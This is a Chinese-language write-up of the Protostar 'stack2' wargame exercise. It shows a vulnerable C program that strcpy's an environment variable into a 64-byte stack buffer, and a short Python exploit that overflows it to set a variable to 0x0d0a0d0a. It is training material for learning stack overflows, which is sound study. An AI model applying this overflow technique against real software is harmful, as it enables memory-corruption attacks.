Protostar——stack2

Posted 2020-11-02 white-noise

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了Protostar——stack2相关的知识，希望对你有一定的参考价值。

简介

　　这次练习通过环境变量设置buffer的值，所以我们需要在exploit中设置一个大于64字节的环境变量。

源码

 1 #include <stdlib.h>
 2 #include <unistd.h>
 3 #include <stdio.h>
 4 #include <string.h>
 5 
 6 int main(int argc, char **argv)
 7 {
 8   volatile int modified;
 9   char buffer[64];
10   char *variable;
11 
12   variable = getenv("GREENIE");
13 
14   if(variable == NULL) {
15       errx(1, "please set the GREENIE environment variable\n");
16   }
17 
18   modified = 0;
19 
20   strcpy(buffer, variable);
21 
22   if(modified == 0x0d0a0d0a) {
23       printf("you have correctly modified the variable\n");
24   } else {
25       printf("Try again, you got 0x%08x\n", modified);
26   }
27 
28 }

分析

　　从代码中可以看到，程序首先通过getenv获得环境变量GREENIE的值并赋给variable变量，再通过strcpy函数将variable的值传递给buffer，同样没有做长度检测，可能发生栈溢出，最后判断modified的值是否为0x0d0a0d0a。
　　其实这个练习在payload上和stack1并没有什么变化，只要把最后修改为0x0a0d0a0d就可以。
　　主要的问题是如何在python中设置环境变量为非打印字符。

EXPLOIT编写

　　使用os模块中的environ可以设置环境变量，但是不能直接设置为0x0a0d0a0d，环境变量设置的值要求是字符串，但是0x0a和0x0d又不是打印字符。所以使用decode函数，把十六进制转换为字符。代码如下：

1 import os
2 payload = "616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161610a0d0a0d"
3 os.environ["GREENIE"] = payload.decode("hex")
4 cmd = "/opt/protostar/bin/stack2"
5 os.system(cmd)

执行结果：

$ python exploit2.py
you have correctly modified the variable

以上是关于Protostar——stack2的主要内容，如果未能解决你的问题，请参考以下文章

Protostar——stack3

Protostar——stack4

Protostar系列linux pwn练习

Protostar——stack1

终于把joomla 的 protostar 模版的菜单，从垂直改到水平了

Protostar——stack0